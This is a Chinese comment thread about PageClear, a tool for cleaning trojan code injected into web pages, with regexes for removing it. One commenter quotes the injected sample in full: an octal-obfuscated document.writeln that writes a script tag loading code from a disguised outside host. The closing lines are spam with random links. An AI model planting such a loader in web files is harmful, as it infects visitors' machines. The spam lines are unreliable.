GOOD | 2008-1-11 19:38:26
请问已经下载了的完整网页能清除干净吗?已知某网站中的是HTML/TrojanDownloader.Agent.BP木马 。几乎某一时段下载的网页都存在,虽然更新后下载的没有问题,但其风格已大变而且工作量太大。请问该如何清除木马使下载的旧网页得以安全保留??盼求解!!
GOOD | 2008-1-11 19:38:28
请问已经下载了的完整网页能清除干净吗?已知某网站中的是HTML/TrojanDownloader.Agent.BP木马 。几乎某一时段下载的网页都存在,虽然更新后下载的没有问题,但其风格已大变而且工作量太大。请问该如何清除木马使下载的旧网页得以安全保留??盼求解!!
回Good:
你说的情况是可以用PageClear清除的,一般情况下只要复制病毒样本到软件中,即可查找并清除,如果病毒嵌入比较复杂,则需要写正则表达式。
我的服务器被插入以下 JS代码
document.writeln("\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\72\57\57\167\45\67\67\167\45\63\63\56\144\45\66\64\156\163\56\45\66\71\156\146\157\57\45\66\71\45\66\105\45\66\66\45\66\106\45\62\105\45\66\101\45\67\63\42\76\74\57\163\143\162\151\160\164\76");
这个怎么用你的表达式查呢,现在这个病毒很猖狂阿,我服务器所有.JS都感染了!
回mbreeze:
正则表达式处填入:
document.writeln\("\\74\\163\\143[\s\S]+?\);然后选择中毒的文件,即可清除。
你好
今天看到你的这个软件 很好
我也用过不少的 批量替换工具
想给你提几个建议
1,批量替换的时候 判断一下大小写是否区分
2,是否完全匹配 虽然有正则表达式可以使用 但是对于普通用户来说 正则表达式 就可能写不出来
3,是否能按照修改日期来批量替换
我的msn wdjialen#hotmail.com
@wdjialen
谢谢你的建议:)
1,批量替换的时候 判断一下大小写是否区分
恩,这个很对
2,是否完全匹配 虽然有正则表达式可以使用 但是对于普通用户来说 正则表达式 就可能写不出来
这是我偷懒的做法:)。。。。
~~~~
谢谢你这软件,这软件太好了~!!
还有一个问题,就是conn.asp清理不了。。
@紫晶莹
你好,<%....%>可用下面的正则表达式:
<%([\s\S]+?)%>
止不住的晕 | 2008-3-24 16:17:07
非常感谢你提供的这个工具!
有一个问题,清除代码的时候,是将网站下回来清除完了再上传回去好呢?还是将此工具上传到服务器,在服务器上直接清除好?
@止不住的晕
你好,2种方法都可以,你可以先把感染的页面代码放到测试框里,经过测试无误即可执行清除了。
宠坏虫儿 | 2008-5-10 23:48:24
赞一个~啵一个~

就这个
@kwenboy
bbs.vskycom.cn/1.jpg 这个?清除应该带前后缀吧?
请发详细的过来看看
怎么能不分大小写啊?我这个是随机的字母变化大小写,根本整不了!谢谢啊
lim | 2008-11-29 12:13:17
有空可以出一个新版本吗,区分一下大小写的
或者可以把源码放出来,让我们学习改进一下
谢谢!
With the bases loaded you struck us out with that aswner!
lXqZ1x , [url=http://khjurmpcpquy.com/]khjurmpcpquy[/url], [link=http://cvgabbtbewfj.com/]cvgabbtbewfj[/link], http://nuyvdkoiwanw.com/
dlO2jk , [url=http://otssvzsdthdz.com/]otssvzsdthdz[/url], [link=http://dbsfmwkzfggx.com/]dbsfmwkzfggx[/link], http://tjbtgptxjhqx.com/